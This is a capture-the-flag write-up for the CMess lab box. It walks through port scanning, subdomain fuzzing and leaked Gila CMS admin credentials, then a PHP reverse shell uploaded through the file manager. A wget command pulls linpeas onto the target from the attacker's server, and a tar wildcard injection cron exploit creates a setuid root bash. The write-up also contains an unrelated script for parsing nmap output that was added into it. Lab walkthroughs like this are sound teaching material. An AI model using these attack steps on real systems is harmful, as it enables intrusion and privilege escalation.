This is a really good medium-level box. It involves enumerating subdomains and discovering sensitive information on the /dev subdomain, including the email address and password of the Gila CMS admin user. With those credentials one can log in via /login. Once inside, the file manager lets us upload a PHP reverse shell, which gives us a foothold on the system. From there we located the user's password in a backup file under /opt. With further system enumeration we escalated our privileges and rooted the box through tar wildcard injection in a root cron job.
Room
Enumeration:
First we run an initial Nmap scan of all 65535 TCP ports on the target, saving greppable output so the open ports can be pulled out afterwards.
sudo nmap -p- --min-rate=5000 -oG CMess 10.10.204.141 -vv
Extracting the open ports from the CMess file:
grep -oP '([\d]+/open)' CMess | awk -F / '{ print $1 }' | tr '\n' ','
The scan found two open ports: 22 (SSH) and 80 (HTTP). The one-liner above turns the greppable output into a comma-separated port list, which is handy when a target has many open ports: it feeds straight into the -p option of the service scan below.
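To automate the port-extraction step above, here is an added shell example (not from the original write-up) that parses nmap's greppable output with awk instead of grep: it handles several hosts in one file and skips filtered and closed entries. The -oG content embedded in it is constructed to resemble the scan above; it is not real scan output, and the helper names (open_ports, port_list, sample_gnmap) are this example's own.

```shell
#!/bin/sh
# Added example, not from the original write-up: extract open ports from
# nmap's greppable (-oG) output. Real -oG files separate fields with tabs;
# the parser only keys on the "Ports:" label, so spaces work just as well.

# Print "<host> <comma-separated open ports>" for each host in a -oG file ($1).
open_ports() {
    awk '
        /^Host:/ && /Ports:/ {
            host = $2
            split($0, half, "Ports: ")             # half[2] = port list (+ trailer)
            n = split(half[2], entry, ",")
            ports = ""
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")             # f[1]=port f[2]=state f[3]=proto
                gsub(/^[ \t]+/, "", f[1])
                if (f[2] == "open")
                    ports = ports (ports == "" ? "" : ",") f[1]
            }
            if (ports != "") print host, ports
        }' "$1"
}

# Print only the port list for one host ($1 = host, $2 = -oG file), ready for nmap -p.
port_list() {
    open_ports "$2" | awk -v h="$1" '$1 == h { print $2 }'
}

# Constructed sample in -oG format (not real scan output): two hosts, one filtered port.
sample_gnmap() {
    cat <<'EOF'
# Nmap 7.93 scan initiated as: nmap -p- --min-rate=5000 -oG CMess -vv 10.10.204.141
Host: 10.10.204.141 ()  Status: Up
Host: 10.10.204.141 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 8080/filtered/tcp//http-proxy///  Ignored State: closed (65532 ports)
Host: 10.10.204.142 ()  Ports: 443/open/tcp//https///  Ignored State: closed (65534 ports)
# Nmap done -- 2 IP addresses (2 hosts up) scanned in 12.52 seconds
EOF
}

# Usage against a real scan: nmap -sVC -p "$(port_list 10.10.204.141 CMess)" 10.10.204.141
# Run with "demo" as the first argument to parse the constructed sample instead.
if [ "${1:-}" = "demo" ]; then
    f=$(mktemp) && sample_gnmap > "$f" && open_ports "$f" && rm -f "$f"
fi
```

Running the script with the argument demo prints one line per host, e.g. 10.10.204.141 22,80; the filtered 8080 entry is dropped because only the open state is kept.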
└──╼ $nmap -sVC -p "22,80" -T4 10.10.204.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-05 17:09 EST
Nmap scan report for 10.10.204.141
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9b652d3939a3850b4233bfd210c051f (RSA)
| 256 21c36e318b85228a6d72868fae64662b (ECDSA)
|_ 256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds
Adding the domain name to the /etc/hosts file.
$echo "10.10.204.141 cmess.thm" | sudo tee -a /etc/hosts
[sudo] password for user:
10.10.204.141 cmess.thm
Browsing to the website shows that it runs Gila CMS, an open-source content management system, so the next step is to check whether it has known public vulnerabilities.
I used searchsploit and also searched Google.
Several results came up, but none of them gets us a shell here: the XSS issues need user interaction that we cannot count on, the LFI and SQLi issues require an authenticated admin session, for which we have no credentials, and the RCE exploit did not work against this target.
Consequently, we ran gobuster to look for directories and files on the target.
gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We got lots of pages, most of them of no use except /login and /admin, but we need credentials in order to log in as an admin or a regular user.
Next we enumerate subdomains (virtual hosts) by fuzzing the Host header. The --hl 107 filter hides responses of 107 lines, the size of the default page the server returns for an unknown host, so only hosts that answer differently are shown.
wfuzz -c -w top1million.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hl 107
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
Adding the subdomain to the /etc/hosts file as well.
echo "10.10.69.214 dev.cmess.thm" | sudo tee -a /etc/hosts
The dev subdomain exposes a development log that contains sensitive information: an email address and a password. The password does not work for SSH, but it does log us in as admin via /admin.
The credentials we used:
Email: andre@cmess.thm
Password: KPFTN_f2yxe%
Now we're in the dashboard. There is a lot going on here, so we can start testing things.
Foothold
Go to Content, then File Manager. As you can see, we have the ability to upload files to the server, which gives us the chance to upload a PHP reverse shell and get RCE.
Before we do that we need to edit the reverse shell so it calls back to us: set the $ip and $port variables near the top of the file to our attacking IP and the port our listener will be on. On ParrotOS the file is found at /usr/share/webshells/php/php-reverse-shell.php.
Then upload the PHP file. Once it is uploaded, browse to the assets folder and trigger the reverse shell by clicking on the file you uploaded.
Make sure you have a listener up and running first!
Boom, we got a shell on the box as www-data, and we can go after the user flag.
For easier interaction it is better to upgrade (stabilize) the shell so the basics work: Ctrl+C, the clear command, and navigating with the arrow keys. The usual sequence is to spawn a pseudo-terminal with Python's pty module, background the shell with Ctrl+Z, run stty raw -echo; fg in our own terminal, and then set TERM.
This accomplishes two things: it turns off our own terminal's echo (which gives us tab completion, the arrow keys, and Ctrl+C to kill processes instead of the shell itself), and it foregrounds the shell again.
Setting TERM=xterm then gives us access to terminal commands such as clear.
Privilege Escalation:
So far this is one of the most challenging privescs I have encountered; it requires thorough enumeration to get done. Before we go ahead, we first need to get linpeas onto the target machine, served from a simple HTTP server on our attacking box.
www-data@cmess:/tmp$ wget http://10.11.46.4:8000/linpeas.sh -O linpeas.sh
--2023-12-08 21:53:06-- http://10.11.46.4:8000/linpeas.sh
Connecting to 10.11.46.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847773 (828K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 827.90K 94.2KB/s in 6.0s
2023-12-08 21:53:12 (137 KB/s) - 'linpeas.sh' saved [847773/847773]
www-data@cmess:/tmp$ chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh
Running linpeas, we discovered a password hidden in the /opt directory in the file .password.bak, and we then tried it against the andre user. linpeas also highlighted a cron job, which we will go after next.
The password is 'UQfsdCB7aAP6'. We ran awk over /etc/passwd to list the accounts with a login shell and found a user named andre, so the newly discovered password most likely belongs to him.
Indeed, it worked: we compromised his account, and the user flag is stored in user.txt in his home directory.
If you ran linpeas you will immediately see a cron job highlighted in red: every two minutes root runs tar to back up everything in andre's backup directory into /tmp/andre_backup.tar.gz.
andre@cmess:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
The wildcard gives us command injection. The shell expands * into the file names in the backup directory before tar runs, and GNU tar accepts options anywhere on the command line, so a file whose name starts with -- is parsed as an option rather than as a file to archive. Because the cron job runs tar as root, any command we smuggle in through such an option also runs as root, so a reverse shell or any other payload we plant there is executed with root privileges. The options that make this possible are documented in the tar manual page:
--checkpoint[=N]
    Display progress messages every Nth record (default 10).
--checkpoint-action=ACTION
    Run ACTION on each checkpoint.
With ACTION set to exec=<command>, tar runs our command at every checkpoint. A file named --checkpoint-action=exec=sh shell.sh therefore makes root's tar execute shell.sh the next time the cron job fires.
andre@cmess:/tmp$ cd /home/andre/backup
andre@cmess:~/backup$ cat note
Note to self.
Anything in here will be backed up!
andre@cmess:~/backup$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > shell.sh
andre@cmess:~/backup$ chmod +x shell.sh
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint=1
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh
The full path in the touch commands matters: a bare touch --checkpoint=1 would treat the name as an option to touch itself. Wait about two minutes and check the /tmp folder: a setuid copy of bash should appear there. Run it with the -p flag (/tmp/bash -p) so that bash keeps root's effective UID instead of dropping it, and you have a root shell.